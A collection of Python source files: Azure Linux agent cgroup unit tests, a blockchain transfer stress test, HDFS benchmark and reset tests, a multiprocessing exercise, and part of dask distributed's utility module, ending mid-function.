def test_start_extension_command_should_use_systemd_run_when_cgroups_are_enabled(self, _):
with mock_cgroup_commands():
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance().start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="the-test-extension-command",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for (args, _) in popen_patch.call_args_list if "the-test-extension-command" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertIn("systemd-run --unit=Microsoft.Compute.TestExtension_1.2.3", command_calls[0], "The extension should have been invoked using systemd")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_start_tracking_the_extension_cgroups(self, _):
# CPU usage is initialized when we begin tracking a CPU cgroup; since this test does not retrieve the
# CPU usage, there is no need for initialization
with mock_cgroup_commands():
CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance().start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertTrue(
any(cg for cg in tracked if cg.name == 'Microsoft.Compute.TestExtension-1.2.3' and 'cpu' in cg.path),
"The extension's CPU is not being tracked")
self.assertTrue(
any(cg for cg in tracked if cg.name == 'Microsoft.Compute.TestExtension-1.2.3' and 'memory' in cg.path),
"The extension's memory is not being tracked")
def test_start_extension_command_should_raise_an_exception_when_the_command_cannot_be_started(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
original_popen = subprocess.Popen
def mock_popen(command_arg, *args, **kwargs):
if "test command" in command_arg:
raise Exception("A TEST EXCEPTION")
return original_popen(command_arg, *args, **kwargs)
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with self.assertRaises(Exception) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertIn("A TEST EXCEPTION", str(context_manager.exception))
def test_check_processes_in_agent_cgroup_should_raise_when_there_are_unexpected_processes_in_the_agent_cgroup(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
# The test script recursively creates a given number of descendant processes, then it blocks until the
# 'stop_file' exists. It produces an output file containing the PID of each descendant process.
test_script = os.path.join(self.tmp_dir, "create_processes.sh")
stop_file = os.path.join(self.tmp_dir, "create_processes.stop")
AgentTestCase.create_script(test_script, """
#!/usr/bin/env bash
set -euo pipefail
if [[ $# != 2 ]]; then
echo "Usage: $0 <output_file> <count>"
exit 1
fi
echo $$ >> $1
if [[ $2 -gt 1 ]]; then
$0 $1 $(($2 - 1))
else
timeout 30s /usr/bin/env bash -c "while ! [[ -f {0} ]]; do sleep 0.25s; done"
fi
exit 0
""".format(stop_file))
number_of_descendants = 3
def wait_for_processes(processes_file):
def _all_present():
if os.path.exists(processes_file):
with open(processes_file, "r") as file_stream:
_all_present.processes = [int(process) for process in file_stream.read().split()]
return len(_all_present.processes) >= number_of_descendants
_all_present.processes = []
if not wait_for(_all_present):
raise Exception("Timeout waiting for processes. Expected {0}; got: {1}".format(
number_of_descendants, format_processes(_all_present.processes)))
return _all_present.processes
threads = []
try:
#
# Start the processes that will be used by the test. We use two sets of processes: the first set simulates a command executed by the agent
# (e.g. iptables) and its child processes, if any. The second set of processes simulates an extension.
#
agent_command_output = os.path.join(self.tmp_dir, "agent_command.pids")
agent_command = threading.Thread(target=lambda: shellutil.run_command([test_script, agent_command_output, str(number_of_descendants)]))
agent_command.start()
threads.append(agent_command)
agent_command_processes = wait_for_processes(agent_command_output)
extension_output = os.path.join(self.tmp_dir, "extension.pids")
def start_extension():
original_sleep = time.sleep
original_popen = subprocess.Popen
# Extensions are started using systemd-run; mock Popen to remove the call to systemd-run; the test script creates a couple of
# child processes, which would simulate the extension's processes.
def mock_popen(command, *args, **kwargs):
match = re.match(r"^systemd-run --unit=[^\s]+ --scope (.+)", command)
is_systemd_run = match is not None
if is_systemd_run:
command = match.group(1)
process = original_popen(command, *args, **kwargs)
if is_systemd_run:
start_extension.systemd_run_pid = process.pid
return process
with patch('time.sleep', side_effect=lambda _: original_sleep(0.1)): # start_extension_command has a small delay; skip it
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
configurator.start_extension_command(
extension_name="TestExtension",
command="{0} {1} {2}".format(test_script, extension_output, number_of_descendants),
timeout=30,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
start_extension.systemd_run_pid = None
extension = threading.Thread(target=start_extension)
extension.start()
threads.append(extension)
extension_processes = wait_for_processes(extension_output)
#
# check_processes_in_agent_cgroup uses shellutil and the cgroups api to get the commands that are currently running;
# wait for all the processes to show up
#
# len-as-condition: Do not use `len(SEQUENCE)` to determine if a sequence is empty - Disabled: explicit check improves readability
# protected-access: Access to a protected member _cgroups_api of a client class - Disabled: OK to access protected member in this unit test
if not wait_for(lambda: len(shellutil.get_running_commands()) > 0 and len(configurator._cgroups_api.get_systemd_run_commands()) > 0): # pylint:disable=len-as-condition,protected-access
raise Exception("Timeout while attempting to track the child commands")
#
# Verify that check_processes_in_agent_cgroup raises when there are unexpected processes in the agent's cgroup.
#
# For the agent's processes, we use the current process and its parent (in the actual agent these would be the daemon and the extension
# handler), and the commands started by the agent.
#
# For other processes, we use process 1, a process that has already completed, and an extension. Note that extensions are started
# using systemd-run; the systemd-run command itself belongs to the agent's cgroup, but the extension's processes should be in a
# different cgroup.
#
def get_completed_process():
random.seed()
completed = random.randint(1000, 10000)
while os.path.exists("/proc/{0}".format(completed)): # ensure we do not use an existing process
completed = random.randint(1000, 10000)
return completed
agent_processes = [os.getppid(), os.getpid()] + agent_command_processes + [start_extension.systemd_run_pid]
other_processes = [1, get_completed_process()] + extension_processes
with patch("azurelinuxagent.common.cgroupconfigurator.CGroupsApi.get_processes_in_cgroup", return_value=agent_processes + other_processes):
with self.assertRaises(UnexpectedProcessesInCGroupException) as context_manager:
CGroupConfigurator.get_instance().check_processes_in_agent_cgroup()
reported = context_manager.exception.unexpected
self.assertEqual(
len(other_processes), len(reported),
"An incorrect number of processes was reported. Expected: {0} Got: {1}".format(format_processes(other_processes), reported))
for pid in other_processes:
self.assertTrue(
any(reported_process.startswith("[PID: {0}]".format(pid)) for reported_process in reported),
"Process {0} was not reported. Got: {1}".format(format_processes([pid]), reported))
#
# And now verify that it does not raise when only the expected processes are in the cgroup
#
error = None
try:
with patch("azurelinuxagent.common.cgroupconfigurator.CGroupsApi.get_processes_in_cgroup", return_value=agent_processes):
CGroupConfigurator.get_instance().check_processes_in_agent_cgroup()
except UnexpectedProcessesInCGroupException as exception:
error = exception
# we fail outside the except clause, otherwise the failure is reported as "During handling of the above exception, another exception occurred:..."
if error is not None:
self.fail("The check of the agent's cgroup should not have reported errors. Reported processes: {0}".format(error.unexpected))
finally:
# create the file that stops the test process and wait for them to complete
open(stop_file, "w").close()
for thread in threads:
thread.join(timeout=5)
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="eosio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission eosio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]  # never use more threads than transfers per second
cycle = int(total / nthreads)  # number of batches; each batch issues nthreads transfers
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads  # target wall-clock time of one batch at the requested rate
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
reset_env.py
|
import unittest
import subprocess
import requests
from util import *
from threading import Thread
FILE_SIZE = 1024 * 1024
def test_create_100M_0KB_thread(max_number):
cids = []
dir_name = TEST_DIR + random_string()
# create max_number 0KB files in a single randomly named dir
for j in range(max_number):
cid = create_file(dir_name + "/" + str(j), 0)
cids.append(cid)
wait_for_cmdlets(cids)
class ResetEnv(unittest.TestCase):
def test_delete_all_rules(self):
"""
delete all rules
"""
rules = list_rule()
for rule in rules:
# Delete all rules
if rule['state'] != 'DELETED':
delete_rule(rule['id'])
rules = [rule for rule in list_rule() if rule['state'] != 'DELETED']
self.assertTrue(len(rules) == 0)
def test_delete_all_files(self):
try:
subprocess.call("hdfs dfs -rm -r " + TEST_DIR, shell=True)
subprocess.call("hdfs dfs -mkdir " + TEST_DIR, shell=True)
except OSError:
print "HDFS Envs is not configured!"
def test_create_1M_DFSIO(self):
"""
Use DFSIO to generate 0KB files: 50 rounds of 10K io_data files each.
(The matching io_control output is left in place; its move is commented out below.)
"""
dir_number = 50
dfsio_cmd = "hadoop jar $HADOOP_HOME/share/hadoop/mapreduce" + \
"/hadoop-mapreduce-client-jobclient-*-tests.jar TestDFSIO " + \
"-write -nrFiles 10000 -fileSize 0KB"
for i in range(dir_number):
subprocess.call(dfsio_cmd, shell=True)
# subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_control " +
# TEST_DIR + str(i) + "_control", shell=True)
subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_data " +
TEST_DIR + str(i) + "_data", shell=True)
def test_create_10M_DFSIO(self):
"""
Use DFSIO to generate 0KB files: 500 rounds of 10K io_data files each.
(The matching io_control output is left in place; its move is commented out below.)
"""
dir_number = 500
dfsio_cmd = "hadoop jar $HADOOP_HOME/share/hadoop/mapreduce" + \
"/hadoop-mapreduce-client-jobclient-*-tests.jar TestDFSIO " + \
"-write -nrFiles 10000 -fileSize 0KB"
for i in range(dir_number):
subprocess.call(dfsio_cmd, shell=True)
# subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_control " +
# TEST_DIR + str(i) + "_control")
subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_data " +
TEST_DIR + str(i) + "_data")
def test_create_10K_0KB_DFSIO_parallel(self):
dir_num = 50
for i in range(dir_num):
file_index = 0
dir_name = TEST_DIR + random_string()
command_arr = []
subprocess.call("hdfs dfs -mkdir " + dir_name)
for i in range(10000 / dir_num):
command_arr.append("hdfs dfs -touchz " +
dir_name + "/" + str(file_index))
file_index += 1
exec_commands(command_arr)
def test_create_100M_0KB_parallel(self):
max_number = 200000
dir_number = 50
for i in range(dir_number):
t = Thread(target=test_create_100M_0KB_thread, args=(max_number,))
t.start()
def test_create_100M_0KB(self):
"""
Create 100M=500K * 200 files in /ssmtest/.
Files will be kept in dir named from 1 to 200.
Files are named from 0-499999.
"""
max_number = 500000
dir_number = 200
for i in range(dir_number):
cids = []
dir_name = TEST_DIR + str(i)
# 200 dirs
for j in range(max_number):
# each has 500K files
cid = create_file(dir_name + "/" + str(j), 0)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_500K_0KB(self):
"""
Create 500K files in /ssmtest/.
All files will be kept in one dir with random name.
Files are named from 0-499999.
"""
max_number = 500000
cids = []
dir_name = TEST_DIR + random_string()
for i in range(max_number):
# each has 500K files
cid = create_file(dir_name + "/" + str(i), 0)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_10000_1MB(self):
"""
Create 10000 * 1 MB files in /1MB/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE, "/1MB/")
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_10000_10MB(self):
"""
Create 10000 * 10 MB files in /10MB/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 10 MB files
file_path, cid = create_random_file_parallel(10 * FILE_SIZE, "/10MB/")
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_1000_100MB(self):
"""
Create 1000 * 100 MB files in /100MB/
"""
max_number = 1000
file_paths = []
cids = []
for i in range(max_number):
# 100 MB files
file_path, cid = create_random_file_parallel(100 * FILE_SIZE, "/100MB/")
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_files_10000(self):
"""
Create 10000 * 1 MB files in /ssmtest/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE)
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_files_1000(self):
"""
Create 1000 * 1 MB files in /ssmtest/
"""
max_number = 1000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE)
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_files_100(self):
"""
Create 100 * 1 MB files in /ssmtest/
"""
max_number = 100
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE)
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
if __name__ == '__main__':
requests.adapters.DEFAULT_RETRIES = 5
s = requests.session()
s.keep_alive = False
unittest.main()
|
06_wrong_again.py
|
import multiprocessing
import time
start = time.perf_counter()
def schlafen(n_sec=1):
print(f"Sleep for {n_sec}(s) ...")
time.sleep(n_sec)
print(f"Done sleeping {n_sec}(s) ...")
n_processes = 40
for _ in range(n_processes):
p = multiprocessing.Process(target=schlafen)
p.start()
p.join()
finish = time.perf_counter()
print(f"Master finished in {round(finish-start, 2)}(s)")
# Can you imagine what would happen when you run this script?
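# Hint, as a hedged sketch (left in a comment so the exercise above keeps its
# behavior): p.join() inside the loop waits for each process to finish before
# the next one starts, so the 40 one-second sleeps run back to back (~40 s).
# Starting all processes first and joining them afterwards lets the sleeps
# overlap (~1 s total):
#
#     processes = [multiprocessing.Process(target=schlafen) for _ in range(n_processes)]
#     for p in processes:
#         p.start()
#     for p in processes:
#         p.join()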
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Raise as soon as any of the tasks errs.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
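# A hedged usage sketch for All() (illustrative; not called anywhere in this
# module): wait on several coroutines, raising as soon as one errs while
# quieting OSError in any stragglers still running when the failure propagates.
@gen.coroutine
def _all_usage_example(futures):
    results = yield All(futures, quiet_exceptions=(OSError,))
    raise gen.Return(results)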
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when a closed loop is used; detect that ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
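# Usage sketch (editor's note): block the calling thread until a coroutine
# finishes on a loop owned by another thread. ``loop`` and ``coro`` are
# hypothetical names; see LoopRunner below for managing such a loop.
#
#     >>> result = sync(loop, coro, arg, callback_timeout=5)  # doctest: +SKIP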
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(start_exc[0], Exception): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
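# Usage sketch (editor's note; ``main`` stands for any tornado coroutine):
#
#     >>> runner = LoopRunner()   # doctest: +SKIP
#     >>> runner.run_sync(main)   # doctest: +SKIP
#     >>> runner.is_started()     # doctest: +SKIP
#     False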
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
    from functools import lru_cache
except ImportError:
    lru_cache = False
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
